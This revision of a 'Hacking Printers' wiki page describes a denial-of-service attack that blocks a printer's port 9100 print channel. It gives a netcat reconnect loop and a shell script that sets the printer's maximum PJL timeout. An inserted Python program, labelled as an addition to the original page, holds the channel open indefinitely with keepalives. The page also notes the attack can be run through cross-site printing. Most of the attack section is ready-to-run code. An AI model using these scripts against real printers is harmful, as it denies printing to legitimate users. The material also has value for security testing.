Difference between revisions of "Transmission channel"

From Hacking Printers
Latest revision as of 12:44, 21 January 2017

If print jobs are processed in series, which is assumed for most devices, only one job can be handled at a time. If this job does not terminate, the printing channel is effectively blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial of service attack can be improved by setting a high timeout value with PJL.

How to test for this attack?

Connecting to port 9100/tcp of a printer without closing the connection prevents most devices from accepting new print jobs. Tests can be performed using the netcat [1] utility in a loop as shown below:

while true; do nc printer 9100; done

A more advanced version of this DoS attack which sets a higher timeout is given below.

# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
  grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done

While the PJL reference specifies a maximum timeout of 300 seconds [2], in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved from the printer and then set in all further connections. The advantage of this approach is that the number of connections the attacker has to make is minimized, while it becomes even harder for legitimate users to win the race for a free time slot in which to deploy a print job. Note that even print jobs received through other printing channels like IPP or LPD are not processed as long as the connection is kept open.
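The same procedure in Python, as an added example that is not part of the original page or of PRET: it parses the "@PJL INFO VARIABLES" reply properly instead of relying on grep offsets, picks the largest advertised TIMEOUT, and then keeps a single job open by sending a harmless "@PJL COMMENT" before the idle timer can expire, so the channel stays blocked with one connection rather than a reconnect loop. The UEL prefix, the sample reply, the hostname "printer" and the keepalive interval are assumptions of this example; the sample reply is constructed to match the PRET output shown on this page and was not captured from a device.

```python
import re
import socket
import time

# PJL Universal Exit Language sequence that opens a PJL job (assumed constant,
# per the HP PJL reference). The page's one-liner sends bare "@PJL" lines,
# which most HP devices also accept.
UEL = b"\x1b%-12345X"

# Constructed sample of an "@PJL INFO VARIABLES" reply modelled on the PRET
# output on this page (TIMEOUT=15, range 5..300). Not captured from a device.
SAMPLE_INFO_VARIABLES = (
    "@PJL INFO VARIABLES\r\n"
    "COPIES=1 [2 RANGE]\r\n"
    "\t1\r\n"
    "\t999\r\n"
    "TIMEOUT=15 [2 RANGE]\r\n"
    "\t5\r\n"
    "\t300\r\n"
    "PERSONALITY=AUTO [3 ENUMERATED]\r\n"
    "\tAUTO\r\n"
    "\tPCL\r\n"
    "\tPOSTSCRIPT\r\n"
    "\x0c"  # form feed terminates a PJL INFO reply
)

# Header line of one variable, e.g. "TIMEOUT=15 [2 RANGE]"
_HEADER = re.compile(r"^([A-Z0-9_]+)=(.*?)\s+\[(\d+)\s+([A-Z ]+)\]$")


def parse_pjl_variables(text):
    """Parse INFO VARIABLES output into {NAME: (current_value, [options])}.

    Each header line is followed by indented lines listing the range bounds
    or enumeration members. Anything that fits neither shape is ignored.
    """
    variables = {}
    name = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("@PJL"):
            continue
        m = _HEADER.match(line)
        if m:
            name = m.group(1)
            variables[name] = (m.group(2), [])
        elif name is not None and line[0] in " \t":
            variables[name][1].append(line.strip())
    return variables


def max_timeout(text):
    """Largest TIMEOUT value the device advertises, or None if not reported."""
    entry = parse_pjl_variables(text).get("TIMEOUT")
    if entry is None:
        return None
    bounds = [int(v) for v in entry[1] if v.lstrip("-").isdigit()]
    return max(bounds) if bounds else None


def build_set_timeout(seconds):
    """Job prefix raising the idle timeout of the current job.

    Deliberately no trailing UEL: ending the job would release the channel.
    """
    if not isinstance(seconds, int) or seconds <= 0:
        raise ValueError("timeout must be a positive number of seconds")
    return UEL + b"@PJL SET TIMEOUT=%d\r\n" % seconds


def query_max_timeout(host, port=9100, read_timeout=3.0):
    """Send INFO VARIABLES to the device and return its maximum TIMEOUT."""
    with socket.create_connection((host, port), timeout=read_timeout) as s:
        s.sendall(UEL + b"@PJL INFO VARIABLES\r\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
                if b"\x0c" in data:
                    break
        except socket.timeout:
            pass
    return max_timeout(b"".join(chunks).decode("ascii", "replace"))


def hold_channel(host, port=9100, keepalive_margin=2):
    """Block port 9100 with one open job, reconnecting only if it drops.

    A "@PJL COMMENT" every (TIMEOUT - margin) seconds resets the idle timer,
    so the job never terminates and no free slot appears for other users.
    """
    timeout = query_max_timeout(host, port) or 15
    interval = max(timeout - keepalive_margin, 1)
    while True:
        try:
            with socket.create_connection((host, port), timeout=5) as s:
                s.sendall(build_set_timeout(timeout))
                while True:
                    time.sleep(interval)
                    s.sendall(b"@PJL COMMENT keepalive\r\n")
        except OSError:
            time.sleep(0.5)


if __name__ == "__main__":
    import sys
    hold_channel(sys.argv[1] if len(sys.argv) > 1 else "printer")
```

Run it against a test device only: it intentionally denies printing on the target for as long as it runs. The parser functions can be exercised offline with the constructed sample.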

To check the PJL timeout settings for your printer, PRET can be used as follows:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
       5
       300

Who can perform this attack?

Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with cross-site printing techniques, as long as the website used to initiate the XHR connections is kept open.



  1. Netcat – TCP/IP Swiss Army Knife, Hobbit, 1996
  2. Printer Job Language Technical Reference Manual, HP Inc., 1997, ch. 6-25, http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf